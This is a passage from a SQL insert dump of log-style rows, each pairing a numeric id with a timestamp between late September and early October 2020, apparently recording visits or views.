22:29:48'),(6520,1695,1,'2020-09-24','2020-09-24 23:01:02'),(6521,1608,1,'2020-09-25','2020-09-25 01:00:49'),(6522,1600,1,'2020-09-25','2020-09-25 02:11:56'),(6523,68,1,'2020-09-25','2020-09-25 02:27:14'),(6524,1600,1,'2020-09-25','2020-09-25 02:48:13'),(6525,1715,1,'2020-09-25','2020-09-25 02:50:34'),(6526,1715,1,'2020-09-25','2020-09-25 02:51:42'),(6527,1715,1,'2020-09-25','2020-09-25 02:52:08'),(6528,1600,1,'2020-09-25','2020-09-25 02:52:09'),(6529,1772,1,'2020-09-25','2020-09-25 02:52:27'),(6530,76,1,'2020-09-25','2020-09-25 04:12:24'),(6531,3030,1,'2020-09-25','2020-09-25 08:40:51'),(6532,3005,1,'2020-09-25','2020-09-25 10:33:24'),(6533,468,1,'2020-09-25','2020-09-25 10:55:09'),(6534,2503,1,'2020-09-25','2020-09-25 11:05:23'),(6535,2309,1,'2020-09-25','2020-09-25 12:10:50'),(6536,2309,1,'2020-09-25','2020-09-25 13:55:56'),(6537,2309,1,'2020-09-25','2020-09-25 13:56:13'),(6538,2309,1,'2020-09-25','2020-09-25 13:59:19'),(6539,2309,1,'2020-09-25','2020-09-25 14:13:11'),(6540,1600,1,'2020-09-25','2020-09-25 16:02:08'),(6541,1588,1,'2020-09-25','2020-09-25 16:54:30'),(6542,1588,1,'2020-09-25','2020-09-25 16:54:47'),(6543,487,1,'2020-09-25','2020-09-25 17:46:14'),(6544,474,1,'2020-09-25','2020-09-25 17:50:48'),(6545,2769,1,'2020-09-25','2020-09-25 20:44:45'),(6546,2769,1,'2020-09-25','2020-09-25 20:44:46'),(6547,3056,1,'2020-09-25','2020-09-25 21:18:42'),(6548,1612,1,'2020-09-26','2020-09-26 06:56:19'),(6549,1612,1,'2020-09-26','2020-09-26 06:56:22'),(6550,3069,1,'2020-09-26','2020-09-26 11:46:36'),(6551,3030,1,'2020-09-26','2020-09-26 14:27:40'),(6552,1582,1,'2020-09-26','2020-09-26 15:15:01'),(6553,2159,1,'2020-09-26','2020-09-26 16:11:50'),(6554,3087,1,'2020-09-26','2020-09-26 16:47:09'),(6555,486,1,'2020-09-26','2020-09-26 19:31:12'),(6556,91,1,'2020-09-26','2020-09-26 20:48:51'),(6557,1588,1,'2020-09-26','2020-09-26 21:49:28'),(6558,72,1,'2020-09-26','2020-09-26 23:53:06'),(6559,3127,1,'2020-09-26','2020-09-26 23:54:11'),(6560,91,1,'2020-09-27','2020-09-27 01:40:18'),(6561,3069,1,'2020-09-27','2020-09-27 02:42:50'),(6562,1588,1,'2020-09-27','2020-09-27 03:10:13'),(6563,1695,1,'2020-09-27','2020-09-27 03:19:16'),(6564,1614,1,'2020-09-27','2020-09-27 04:12:27'),(6565,2457,1,'2020-09-27','2020-09-27 04:31:20'),(6566,91,1,'2020-09-27','2020-09-27 04:32:16'),(6567,1608,1,'2020-09-27','2020-09-27 05:19:16'),(6568,2457,1,'2020-09-27','2020-09-27 05:22:26'),(6569,570,1,'2020-09-27','2020-09-27 06:43:35'),(6570,1588,1,'2020-09-27','2020-09-27 08:05:00'),(6571,3109,1,'2020-09-27','2020-09-27 08:06:02'),(6572,1588,1,'2020-09-27','2020-09-27 08:06:08'),(6573,76,1,'2020-09-27','2020-09-27 08:06:20'),(6574,2904,1,'2020-09-27','2020-09-27 08:06:49'),(6575,1606,1,'2020-09-27','2020-09-27 10:19:50'),(6576,68,1,'2020-09-27','2020-09-27 10:24:46'),(6577,2769,1,'2020-09-27','2020-09-27 13:56:20'),(6578,2989,1,'2020-09-27','2020-09-27 18:11:42'),(6579,1588,1,'2020-09-27','2020-09-27 18:25:55'),(6580,2503,1,'2020-09-27','2020-09-27 18:41:44'),(6581,2503,1,'2020-09-28','2020-09-28 02:17:38'),(6582,2457,1,'2020-09-28','2020-09-28 04:33:44'),(6583,1582,1,'2020-09-28','2020-09-28 04:35:07'),(6584,2457,1,'2020-09-28','2020-09-28 04:36:58'),(6585,80,1,'2020-09-28','2020-09-28 04:37:44'),(6586,2457,1,'2020-09-28','2020-09-28 04:39:52'),(6587,2457,1,'2020-09-28','2020-09-28 04:40:34'),(6588,84,1,'2020-09-28','2020-09-28 09:05:20'),(6589,1877,1,'2020-09-28','2020-09-28 09:05:29'),(6590,91,1,'2020-09-28','2020-09-28 09:05:44'),(6591,76,1,'2020-09-28','2020-09-28 09:07:04'),(6592,72,1,'2020-09-28','2020-09-28 09:07:10'),(6593,1594,1,'2020-09-28','2020-09-28 09:43:41'),(6594,2309,1,'2020-09-28','2020-09-28 10:16:05'),(6595,74,1,'2020-09-28','2020-09-28 10:46:41'),(6596,2457,1,'2020-09-28','2020-09-28 11:49:44'),(6597,80,1,'2020-09-28','2020-09-28 11:50:09'),(6598,2457,1,'2020-09-28','2020-09-28 12:16:06'),(6599,2457,1,'2020-09-28','2020-09-28 12:17:27'),(6600,80,1,'2020-09-28','2020-09-28 12:26:46'),(6601,80,1,'2020-09-28','2020-09-28 12:26:54'),(6602,1614,1,'2020-09-28','2020-09-28 13:02:15'),(6603,2457,1,'2020-09-28','2020-09-28 14:19:03'),(6604,91,1,'2020-09-28','2020-09-28 14:20:14'),(6605,1600,1,'2020-09-28','2020-09-28 17:54:19'),(6606,1606,1,'2020-09-29','2020-09-29 03:00:56'),(6607,1606,1,'2020-09-29','2020-09-29 03:01:34'),(6608,2457,1,'2020-09-29','2020-09-29 06:55:24'),(6609,1870,1,'2020-09-29','2020-09-29 07:07:00'),(6610,2769,1,'2020-09-29','2020-09-29 08:40:30'),(6611,2904,1,'2020-09-29','2020-09-29 08:41:23'),(6612,1594,1,'2020-09-29','2020-09-29 08:54:12'),(6613,1594,1,'2020-09-29','2020-09-29 08:54:52'),(6614,2309,1,'2020-09-29','2020-09-29 10:29:36'),(6615,1606,1,'2020-09-29','2020-09-29 10:49:15'),(6616,2609,1,'2020-09-29','2020-09-29 11:41:19'),(6617,2751,1,'2020-09-29','2020-09-29 11:52:21'),(6618,3030,1,'2020-09-29','2020-09-29 11:56:26'),(6619,2609,1,'2020-09-29','2020-09-29 12:06:06'),(6620,2609,1,'2020-09-29','2020-09-29 12:49:22'),(6621,2609,1,'2020-09-29','2020-09-29 12:53:18'),(6622,1594,1,'2020-09-29','2020-09-29 14:36:35'),(6623,1600,1,'2020-09-29','2020-09-29 15:56:54'),(6624,3127,1,'2020-09-29','2020-09-29 16:01:20'),(6625,3124,1,'2020-09-29','2020-09-29 16:01:45'),(6626,3038,1,'2020-09-29','2020-09-29 16:14:17'),(6627,1600,1,'2020-09-29','2020-09-29 17:01:41'),(6628,3034,1,'2020-09-29','2020-09-29 18:57:42'),(6629,2609,1,'2020-09-29','2020-09-29 23:20:30'),(6630,3030,1,'2020-09-30','2020-09-30 00:18:08'),(6631,1718,1,'2020-09-30','2020-09-30 00:23:49'),(6632,2769,1,'2020-09-30','2020-09-30 06:55:38'),(6633,1614,1,'2020-09-30','2020-09-30 08:43:49'),(6634,2769,1,'2020-09-30','2020-09-30 08:52:38'),(6635,3058,1,'2020-09-30','2020-09-30 09:08:19'),(6636,1604,1,'2020-09-30','2020-09-30 09:41:06'),(6637,80,1,'2020-09-30','2020-09-30 09:42:15'),(6638,72,1,'2020-09-30','2020-09-30 10:12:16'),(6639,72,1,'2020-09-30','2020-09-30 10:31:27'),(6640,3038,1,'2020-09-30','2020-09-30 10:31:37'),(6641,91,1,'2020-09-30','2020-09-30 10:31:39'),(6642,3140,1,'2020-09-30','2020-09-30 10:32:12'),(6643,89,1,'2020-09-30','2020-09-30 10:41:25'),(6644,91,1,'2020-09-30','2020-09-30 10:41:31'),(6645,3142,1,'2020-09-30','2020-09-30 10:44:01'),(6646,91,1,'2020-09-30','2020-09-30 10:44:20'),(6647,91,1,'2020-09-30','2020-09-30 10:45:15'),(6648,91,1,'2020-09-30','2020-09-30 10:52:36'),(6649,3144,1,'2020-09-30','2020-09-30 10:58:08'),(6650,91,1,'2020-09-30','2020-09-30 11:03:49'),(6651,91,1,'2020-09-30','2020-09-30 11:21:16'),(6652,91,1,'2020-09-30','2020-09-30 11:29:45'),(6653,91,1,'2020-09-30','2020-09-30 11:29:52'),(6654,91,1,'2020-09-30','2020-09-30 11:32:54'),(6655,91,1,'2020-09-30','2020-09-30 11:38:11'),(6656,3148,1,'2020-09-30','2020-09-30 11:38:44'),(6657,488,1,'2020-09-30','2020-09-30 11:47:49'),(6658,89,1,'2020-09-30','2020-09-30 12:04:53'),(6659,91,1,'2020-09-30','2020-09-30 12:05:31'),(6660,1586,1,'2020-09-30','2020-09-30 12:09:55'),(6661,91,1,'2020-09-30','2020-09-30 12:14:00'),(6662,3151,1,'2020-09-30','2020-09-30 12:16:26'),(6663,91,1,'2020-09-30','2020-09-30 12:22:41'),(6664,3151,1,'2020-09-30','2020-09-30 12:23:16'),(6665,91,1,'2020-09-30','2020-09-30 12:24:35'),(6666,1741,1,'2020-09-30','2020-09-30 13:20:54'),(6667,2309,1,'2020-09-30','2020-09-30 13:22:38'),(6668,2956,1,'2020-09-30','2020-09-30 13:30:44'),(6669,91,1,'2020-09-30','2020-09-30 13:35:03'),(6670,91,1,'2020-09-30','2020-09-30 13:43:22'),(6671,2154,1,'2020-09-30','2020-09-30 13:49:09'),(6672,1588,1,'2020-09-30','2020-09-30 14:18:53'),(6673,1604,1,'2020-09-30','2020-09-30 14:34:54'),(6674,1544,1,'2020-09-30','2020-09-30 14:35:13'),(6675,91,1,'2020-09-30','2020-09-30 14:41:33'),(6676,1604,1,'2020-09-30','2020-09-30 14:42:39'),(6677,1604,1,'2020-09-30','2020-09-30 14:43:00'),(6678,84,1,'2020-09-30','2020-09-30 14:43:15'),(6679,2457,1,'2020-09-30','2020-09-30 15:12:59'),(6680,80,1,'2020-09-30','2020-09-30 15:13:12'),(6681,2248,1,'2020-09-30','2020-09-30 15:15:12'),(6682,3087,1,'2020-09-30','2020-09-30 15:42:18'),(6683,2248,1,'2020-09-30','2020-09-30 15:44:22'),(6684,2609,1,'2020-09-30','2020-09-30 15:52:06'),(6685,2248,1,'2020-09-30','2020-09-30 16:13:43'),(6686,2159,1,'2020-09-30','2020-09-30 16:54:47'),(6687,2503,1,'2020-09-30','2020-09-30 17:10:45'),(6688,2809,1,'2020-09-30','2020-09-30 18:26:25'),(6689,1772,1,'2020-09-30','2020-09-30 20:05:35'),(6690,1582,1,'2020-09-30','2020-09-30 20:12:07'),(6691,3041,1,'2020-09-30','2020-09-30 21:50:58'),(6692,2989,1,'2020-09-30','2020-09-30 22:31:04'),(6693,2297,1,'2020-09-30','2020-09-30 23:25:30'),(6694,2309,1,'2020-09-30','2020-09-30 23:41:45'),(6695,1600,1,'2020-09-30','2020-09-30 23:52:11'),(6696,2309,1,'2020-10-01','2020-10-01 00:19:11'),(6697,1604,1,'2020-10-01','2020-10-01 00:21:48'),(6698,1741,1,'2020-10-01','2020-10-01 00:29:51'),(6699,74,1,'2020-10-01','2020-10-01 00:44:55'),(6700,1614,1,'2020-10-01','2020-10-01 01:32:02'),(6701,1588,1,'2020-10-01','2020-10-01 02:01:09'),(6702,3127,1,'2020-10-01','2020-10-01 02:14:42'),(6703,3069,1,'2020-10-01','2020-10-01 02:22:09'),(6704,570,1,'2020-10-01','2020-10-01 03:18:53'),(6705,2159,1,'2020-10-01','2020-10-01 06:05:54'),(6706,2419,1,'2020-10-01','2020-10-01 07:17:06'),(6707,1749,1,'2020-10-01','2020-10-01 07:23:32'),(6708,2150,1,'2020-10-01','2020-10-01 07:26:48'),(6709,68,1,'2020-10-01','2020-10-01 07:46:09'),(6710,1600,1,'2020-10-01','2020-10-01 10:34:58'),(6711,1604,1,'2020-10-01','2020-10-01 10:44:53'),(6712,1594,1,'2020-10-01','2020-10-01 10:49:46'),(6713,484,1,'2020-10-01','2020-10-01 11:19:16'),(6714,3083,1,'2020-10-01','2020-10-01 11:35:07'),(6715,1588,1,'2020-10-01','2020-10-01 11:39:03'),(6716,2457,1,'2020-10-01','2020-10-01 11:49:34'),(6717,2956,1,'2020-10-01','2020-10-01 12:30:41'),(6718,2609,1,'2020-10-01','2020-10-01 13:05:41'),(6719,2609,1,'2020-10-01','2020-10-01 13:12:01'),(6720,1596,1,'2020-10-01','2020-10-01 13:19:26'),(6721,3045,1,'2020-10-01','2020-10-01 13:43:22'),(6722,89,1,'2020-10-01','2020-10-01 14:16:33'),(6723,89,1,'2020-10-01','2020-10-01 14:22:30'),(6724,1588,1,'2020-10-01','2020-10-01 14:31:00'),(6725,2150,1,'2020-10-01','2020-10-01 14:39:19'),(6726,2457,1,'2020-10-01','2020-10-01 15:15:49'),(6727,570,1,'2020-10-01','2020-10-01 15:26:02'),(6728,1604,1,'2020-10-01','2020-10-01 15:46:29'),(6729,1604,1,'2020-10-01','2020-10-01 15:51:11'),(6730,1604,1,'2020-10-01','2020-10-01 15:52:39'),(6731,1772,1,'2020-10-01','2020-10-01 16:32:07'),(6732,3104,1,'2020-10-01','2020-10-01 16:36:04'),(6733,3124,1,'2020-10-01','2020-10-01 16:53:15'),(6734,2904,1,'2020-10-01','2020-10-01 18:06:37'),(6735,1594,1,'2020-10-01','2020-10-01 18:16:33'),(6736,1604,1,'2020-10-01','2020-10-01 18:32:19'),(6737,2751,1,'2020-10-01','2020-10-01 18:34:26'),(6738,1730,1,'2020-10-01','2020-10-01 18:46:33'),(6739,1749,1,'2020-10-01','2020-10-01 18:54:46'),(6740,1614,1,'2020-10-01','2020-10-01 19:06:54'),(6741,2503,1,'2020-10-01','2020-10-01 19:17:51'),(6742,80,1,'2020-10-01','2020-10-01 20:24:00'),(6743,3107,1,'2020-10-01','2020-10-01 20:33:08'),(6744,2159,1,'2020-10-01','2020-10-01 20:45:30'),(6745,91,1,'2020-10-01','2020-10-01 20:50:39'),(6746,91,1,'2020-10-01','2020-10-01 20:50:39'),(6747,91,1,'2020-10-01','2020-10-01 20:51:34'),(6748,91,1,'2020-10-01','2020-10-01 20:54:21'),(6749,484,1,'2020-10-01','2020-10-01 21:03:45'),(6750,1588,1,'2020-10-01','2020-10-01 21:27:21'),(6751,3034,1,'2020-10-01','2020-10-01 21:37:55'),(6752,1600,1,'2020-10-01','2020-10-01 22:36:53'),(6753,2419,1,'2020-10-01','2020-10-01 22:39:08'),(6754,2503,1,'2020-10-02','2020-10-02 00:04:45'),(6755,468,1,'2020-10-02','2020-10-02 00:22:29'),(6756,1598,1,'2020-10-02','2020-10-02 02:46:37'),(6757,1877,1,'2020-10-02','2020-10-02 02:52:26'),(6758,2904,1,'2020-10-02','2020-10-02 02:54:07'),(6759,2309,1,'2020-10-02','2020-10-02 02:56:45'),(6760,2956,1,'2020-10-02','2020-10-02 03:06:49'),(6761,1582,1,'2020-10-02','2020-10-02 03:16:57'),(6762,72,1,'2020-10-02','2020-10-02 03:37:04'),(6763,1606,1,'2020-10-02','2020-10-02 03:47:53'),(6764,2801,1,'2020-10-02','2020-10-02 03:55:03'),(6765,1614,1,'2020-10-02','2020-10-02 04:07:10'),(6766,80,1,'2020-10-02','2020-10-02 05:07:43'),(6767,2503,1,'2020-10-02','2020-10-02 06:11:06'),(6768,2165,1,'2020-10-02','2020-10-02 06:23:04'),(6769,2419,1,'2020-10-02','2020-10-02 07:37:36'),(6770,91,1,'2020-10-02','2020-10-02 10:36:23'),(6771,84,1,'2020-10-02','2020-10-02 10:37:53'),(6772,1877,1,'2020-10-02','2020-10-02 10:38:03'),(6773,84,1,'2020-10-02','2020-10-02 10:38:13'),(6774,68,1,'2020-10-02','2020-10-02 11:43:26'),(6775,2148,1,'2020-10-02','2020-10-02 12:13:59'),(6776,91,1,'2020-10-02','2020-10-02 12:43:07'),(6777,91,1,'2020-10-02','2020-10-02 13:06:43'),(6778,2297,1,'2020-10-02','2020-10-02 13:08:03'),(6779,2457,1,'2020-10-02','2020-10-02 13:08:07'),(6780,91,1,'2020-10-02','2020-10-02 13:09:02'),(6781,91,1,'2020-10-02','2020-10-02 13:09:21'),(6782,1730,1,'2020-10-02','2020-10-02 13:09:26'),(6783,1600,1,'2020-10-02','2020-10-02 13:28:07'),(6784,3117,1,'2020-10-02','2020-10-02 14:22:23'),(6785,3127,1,'2020-10-02','2020-10-02 14:22:55'),(6786,108,1,'2020-10-02','2020-10-02 14:31:18'),(6787,84,1,'2020-10-02','2020-10-02 14:31:24'),(6788,1604,1,'2020-10-02','2020-10-02 17:58:42'),(6789,3006,1,'2020-10-02','2020-10-02 18:00:27'),(6790,3038,1,'2020-10-02','2020-10-02 19:45:54'),(6791,87,1,'2020-10-02','2020-10-02 22:12:09'),(6792,1730,1,'2020-10-02','2020-10-02 22:58:04'),(6793,1586,1,'2020-10-03','2020-10-03 02:36:40'),(6794,1586,1,'2020-10-03','2020-10-03 02:36:40'),(6795,1586,1,'2020-10-03','2020-10-03 02:47:48'),(6796,1586,1,'2020-10-03','2020-10-03 02:47:48'),(6797,1588,1,'2020-10-03','2020-10-03 10:27:19'),(6798,1588,1,'2020-10-03','2020-10-03 10:27:21'),(6799,1588,1,'2020-10-03','2020-10-03 10:27:30'),(6800,1604,1,'2020-10-03','2020-10-03 11:05:38'),(6801,76,1,'2020-10-03','2020-10-03 11:05:59'),(6802,1604,1,'2020-10-03','2020-10-03 11:07:42'),(6803,1604,1,'2020-10-03','2020-10-03 11:16:03'),(6804,91,1,'2020-10-03','2020-10-03 11:16:22'),(6805,1582,1,'2020-10-03','2020-10-03 12:33:25'),(6806,1582,1,'2020-10-03','2020-10-03 12:33:28'),(6807,1600,1,'2020-10-03','2020-10-03 16:30:45'),(6808,1586,1,'2020-10-03','2020-10-03 18:58:51'),(6809,1588,1,'2020-10-04','2020-10-04 06:03:34'),(6810,1600,1,'2020-10-04','2020-10-04 06:15:28'),(6811,1600,1,'2020-10-04','2020-10-04 08:34:34'),(6812,2309,1,'2020-10-04','2020-10-04 10:44:49'),(6813,1606,1,'2020-10-04','2020-10-04 11:55:32'),(6814,1606,1,'2020-10-04','2020-10-04 11:55:32'),(6815,1737,1,'2020-10-04','2020-10-04 14:05:41'),(6816,1737,1,'2020-10-04','2020-10-04 14:05:45'),(6817,1737,1,'2020-10-04','2020-10-04 14:13:52'),(6818,3107,1,'2020-10-04','2020-10-04 15:30:19'),(6819,1586,1,'2020-10-04','2020-10-04 18:35:16'),(6820,2309,1,'2020-10-04','2020-10-04 19:35:29'),(6821,1600,1,'2020-10-04','2020-10-04 20:32:05'),(6822,1600,1,'2020-10-04','2020-10-04 20:32:30'),(6823,1592,1,'2020-10-04','2020-10-04 20:44:24'),(6824,486,1,'2020-10-04','2020-10-04 22:12:31'),(6825,1600,1,'2020-10-04','2020-10-04 22:17:10'),(6826,91,1,'2020-10-05','2020-10-05 00:24:35'),(6827,3060,1,'2020-10-05','2020-10-05 01:56:35'),(6828,2609,1,'2020-10-05','2020-10-05 04:38:54'),(6829,1588,1,'2020-10-05','2020-10-05 04:58:34'),(6830,1588,1,'2020-10-05','2020-10-05 04:58:34'),(6831,2159,1,'2020-10-05','2020-10-05 08:49:50'),(6832,1600,1,'2020-10-05','2020-10-05 08:59:47'),(6833,2813,1,'2020-10-05','2020-10-05 09:22:14'),(6834,3069,1,'2020-10-05','2020-10-05 09:30:26'),(6835,2457,1,'2020-10-05','2020-10-05 09:51:30'),(6836,1586,1,'2020-10-05','2020-10-05 10:00:02'),(6837,1614,1,'2020-10-05','2020-10-05 10:40:02'),(6838,1614,1,'2020-10-05','2020-10-05 11:30:49'),(6839,1614,1,'2020-10-05','2020-10-05 11:31:02'),(6840,3055,1,'2020-10-05','2020-10-05 12:13:40'),(6841,1600,1,'2020-10-05','2020-10-05 15:30:51'),(6842,68,1,'2020-10-05','2020-10-05 15:46:27'),(6843,1604,1,'2020-10-05','2020-10-05 16:16:15'),(6844,68,1,'2020-10-05','2020-10-05 16:16:58'),(6845,1604,1,'2020-10-05','2020-10-05 16:17:11'),(6846,1600,1,'2020-10-05','2020-10-05 21:55:31'),(6847,1544,1,'2020-10-05','2020-10-05 22:05:44'),(6848,89,1,'2020-10-05','2020-10-05 22:05:52'),(6849,3066,1,'2020-10-05','2020-10-05 22:15:33'),(6850,2411,1,'2020-10-05','2020-10-05 22:49:12'),(6851,2309,1,'2020-10-05','2020-10-05 22:59:04'),(6852,477,1,'2020-10-05','2020-10-05 23:49:18'),(6853,102,1,'2020-10-06','2020-10-06 00:19:23'),(6854,1718,1,'2020-10-06','2020-10-06 00:49:22'),(6855,570,1,'2020-10-06','2020-10-06 00:59:34'),(6856,2410,1,'2020-10-06','2020-10-06 02:30:20'),(6857,2159,1,'2020-10-06','2020-10-06 02:50:31'),(6858,3038,1,'2020-10-06','2020-10-06 03:58:04'),(6859,2609,1,'2020-10-06','2020-10-06 03:59:42'),(6860,91,1,'2020-10-06','2020-10-06 05:43:13'),(6861,1604,1,'2020-10-06','2020-10-06 06:00:39'),(6862,1600,1,'2020-10-06','2020-10-06 07:31:33'),(6863,2503,1,'2020-10-06','2020-10-06 08:51:55'),(6864,570,1,'2020-10-06','2020-10-06 10:52:51'),(6865,2813,1,'2020-10-06','2020-10-06 10:58:24'),(6866,2813,1,'2020-10-06','2020-10-06 10:58:37'),(6867,2309,1,'2020-10-06','2020-10-06 11:23:09'),(6868,1594,1,'2020-10-06','2020-10-06 11:53:29'),(6869,2309,1,'2020-10-06','2020-10-06 13:23:51'),(6870,570,1,'2020-10-06','2020-10-06 13:26:03'),(6871,76,1,'2020-10-06','2020-10-06 13:33:42'),(6872,91,1,'2020-10-06','2020-10-06 13:33:50'),(6873,87,1,'2020-10-06','2020-10-06 13:37:21'),(6874,89,1,'2020-10-06','2020-10-06 13:39:59'),(6875,1606,1,'2020-10-06','2020-10-06 13:45:28'),(6876,2989,1,'2020-10-06','2020-10-06 14:12:37'),(6877,2159,1,'2020-10-06','2020-10-06 14:13:49'),(6878,1600,1,'2020-10-06','2020-10-06 15:06:08'),(6879,1600,1,'2020-10-06','2020-10-06 15:54:05'),(6880,80,1,'2020-10-06','2020-10-06 17:34:53'),(6881,108,1,'2020-10-06','2020-10-06 18:09:28'),(6882,108,1,'2020-10-06','2020-10-06 18:09:38'),(6883,1588,1,'2020-10-06','2020-10-06 18:45:35'),(6884,2457,1,'2020-10-06','2020-10-06 20:05:56'),(6885,2813,1,'2020-10-06','2020-10-06 21:25:18'),(6886,3069,1,'2020-10-06','2020-10-06 21:26:48'),(6887,3107,1,'2020-10-06','2020-10-06 23:47:02'),(6888,1614,1,'2020-10-06','2020-10-06 23:57:04'),(6889,3069,1,'2020-10-07','2020-10-07 00:12:12'),(6890,2609,1,'2020-10-07','2020-10-07 00:39:37'),(6891,1604,1,'2020-10-07','2020-10-07 01:11:20'),(6892,486,1,'2020-10-07','2020-10-07 01:44:29'),(6893,3117,1,'2020-10-07','2020-10-07 01:51:26'),(6894,72,1,'2020-10-07','2020-10-07 02:41:32'),(6895,3102,1,'2020-10-07','2020-10-07 02:48:48'),(6896,1582,1,'2020-10-07','2020-10-07 02:57:51'),(6897,2309,1,'2020-10-07','2020-10-07 04:52:09'),(6898,1606,1,'2020-10-07','2020-10-07 05:15:59'),(6899,91,1,'2020-10-07','2020-10-07 05:22:47'),(6900,1582,1,'2020-10-07','2020-10-07 05:35:35'),(6901,1588,1,'2020-10-07','2020-10-07 05:45:18'),(6902,1743,1,'2020-10-07','2020-10-07 07:21:38'),(6903,91,1,'2020-10-07','2020-10-07 07:21:57'),(6904,1598,1,'2020-10-07','2020-10-07 08:20:19'),(6905,1598,1,'2020-10-07','2020-10-07 08:20:24'),(6906,76,1,'2020-10-07','2020-10-07 08:22:40'),(6907,76,1,'2020-10-07','2020-10-07 08:22:41'),(6908,1598,1,'2020-10-07','2020-10-07 08:22:57'),(6909,1598,1,'2020-10-07','2020-10-07 08:23:08'),(6910,1600,1,'2020-10-07','2020-10-07 08:24:25'),(6911,2503,1,'2020-10-07','2020-10-07 09:27:21'),(6912,1598,1,'2020-10-07','2020-10-07 09:31:32'),(6913,3117,1,'2020-10-07','2020-10-07 10:58:45'),(6914,1598,1,'2020-10-07','2020-10-07 11:43:17'),(6915,2609,1,'2020-10-07','2020-10-07 11:49:22'),(6916,3107,1,'2020-10-07','2020-10-07 12:14:28'),(6917,3069,1,'2020-10-07','2020-10-07 12:18:17'),(6918,1604,1,'2020-10-07','2020-10-07 12:19:38'),(6919,2309,1,'2020-10-07','2020-10-07 12:29:29'),(6920,1614,1,'2020-10-07','2020-10-07 12:59:23'),(6921,1614,1,'2020-10-07','2020-10-07 13:06:09'),(6922,2503,1,'2020-10-07','2020-10-07 13:06:49'),(6923,1582,1,'2020-10-07','2020-10-07 13:19:30'),(6924,1586,1,'2020-10-07','2020-10-07 14:24:07'),(6925,2309,1,'2020-10-07','2020-10-07 17:20:33'),(6926,1600,1,'2020-10-07','2020-10-07 17:40:45'),(6927,1588,1,'2020-10-07','2020-10-07 17:50:55'),(6928,1588,1,'2020-10-07','2020-10-07 18:01:00'),(6929,80,1,'2020-10-07','2020-10-07 20:41:28'),(6930,3117,1,'2020-10-07','2020-10-07 20:45:34'),(6931,2609,1,'2020-10-07','2020-10-07 21:41:33'),(6932,72,1,'2020-10-08','2020-10-08 01:12:15'),(6933,1614,1,'2020-10-08','2020-10-08 02:13:50'),(6934,2457,1,'2020-10-08','2020-10-08 02:14:16'),(6935,1588,1,'2020-10-08','2020-10-08 02:53:43'),(6936,1600,1,'2020-10-08','2020-10-08 04:45:09'),(6937,1600,1,'2020-10-08','2020-10-08 05:25:13'),(6938,3038,1,'2020-10-08','2020-10-08 05:51:39'),(6939,2609,1,'2020-10-08','2020-10-08 07:06:03'),(6940,2309,1,'2020-10-08','2020-10-08 07:35:44'),(6941,1604,1,'2020-10-08','2020-10-08 07:55:59'),(6942,1588,1,'2020-10-08','2020-10-08 08:15:54'),(6943,3069,1,'2020-10-08','2020-10-08 08:17:12'),(6944,1718,1,'2020-10-08','2020-10-08 09:36:22'),(6945,2557,1,'2020-10-08','2020-10-08 10:26:22'),(6946,3069,1,'2020-10-08','2020-10-08 10:56:18'),(6947,2309,1,'2020-10-08','2020-10-08 11:16:48'),(6948,2159,1,'2020-10-08','2020-10-08 11:20:33'),(6949,1614,1,'2020-10-08','2020-10-08 11:47:16'),(6950,3124,1,'2020-10-08','2020-10-08 12:10:22'),(6951,2309,1,'2020-10-08','2020-10-08 13:00:51'),(6952,1588,1,'2020-10-08','2020-10-08 13:06:54'),(6953,1594,1,'2020-10-08','2020-10-08 14:31:14'),(6954,80,1,'2020-10-08','2020-10-08 14:31:40'),(6955,1600,1,'2020-10-08','2020-10-08 14:46:59'),(6956,1600,1,'2020-10-08','2020-10-08 16:26:51'),(6957,1718,1,'2020-10-08','2020-10-08 17:27:22'),(6958,3038,1,'2020-10-08','2020-10-08 18:20:18'),(6959,3109,1,'2020-10-08','2020-10-08 18:27:12'),(6960,2248,1,'2020-10-08','2020-10-08 20:48:07'),(6961,2964,1,'2020-10-08','2020-10-08 21:04:53'),(6962,1614,1,'2020-10-08','2020-10-08 22:19:07'),(6963,1600,1,'2020-10-09','2020-10-09 00:10:08'),(6964,1600,1,'2020-10-09','2020-10-09 00:17:37'),(6965,2309,1,'2020-10-09','2020-10-09 01:40:23'),(6966,2309,1,'2020-10-09','2020-10-09 02:00:32'),(6967,1586,1,'2020-10-09','2020-10-09 03:10:40'),(6968,1604,1,'2020-10-09','2020-10-09 03:30:42'),(6969,2609,1,'2020-10-09','2020-10-09 03:50:51'),(6970,1588,1,'2020-10-09','2020-10-09 04:11:13'),(6971,3038,1,'2020-10-09','2020-10-09 05:22:06'),(6972,1600,1,'2020-10-09','2020-10-09 05:32:03'),(6973,3069,1,'2020-10-09','2020-10-09 07:34:25'),(6974,76,1,'2020-10-09','2020-10-09 07:47:08'),(6975,1614,1,'2020-10-09','2020-10-09 08:40:36'),(6976,3005,1,'2020-10-09','2020-10-09 09:17:13'),(6977,1614,1,'2020-10-09','2020-10-09 09:44:09'),(6978,1606,1,'2020-10-09','2020-10-09 14:08:04'),(6979,1586,1,'2020-10-09','2020-10-09 15:13:45'),(6980,80,1,'2020-10-09','2020-10-09 15:18:17'),(6981,2989,1,'2020-10-09','2020-10-09 15:20:07'),(6982,1600,1,'2020-10-09','2020-10-09 17:19:00'),(6983,2309,1,'2020-10-09','2020-10-09 17:27:21'),(6984,1588,1,'2020-10-09','2020-10-09 17:34:53'),(6985,2309,1,'2020-10-09','2020-10-09 18:13:04'),(6986,1614,1,'2020-10-09','2020-10-09 18:59:54'),(6987,1586,1,'2020-10-09','2020-10-09 19:42:59'),(6988,2309,1,'2020-10-09','2020-10-09 20:09:54'),(6989,1588,1,'2020-10-09','2020-10-09 20:40:20'),(6990,1604,1,'2020-10-09','2020-10-09 20:50:23'),(6991,1614,1,'2020-10-09','2020-10-09 21:00:19'),(6992,3069,1,'2020-10-09','2020-10-09 21:56:10'),(6993,2609,1,'2020-10-09','2020-10-09 22:30:46'),(6994,2309,1,'2020-10-09','2020-10-09 22:43:32'),(6995,1582,1,'2020-10-09','2020-10-09 23:06:54'),(6996,1582,1,'2020-10-09','2020-10-09 23:12:03'),(6997,91,1,'2020-10-09','2020-10-09 23:24:52'),(6998,91,1,'2020-10-09','2020-10-09 23:25:31'),(6999,91,1,'2020-10-09','2020-10-09 23:26:46'),(7000,91,1,'2020-10-09','2020-10-09 23:26:57'),(7001,2420,1,'2020-10-10','2020-10-10 00:11:25'),(7002,1586,1,'2020-10-10','2020-10-10 00:31:30'),(7003,2609,1,'2020-10-10','2020-10-10 00:32:01'),(7004,2159,1,'2020-10-10','2020-10-10 01:41:22'),(7005,1600,1,'2020-10-10','2020-10-10 02:42:25'),(7006,2658,1,'2020-10-10','2020-10-10 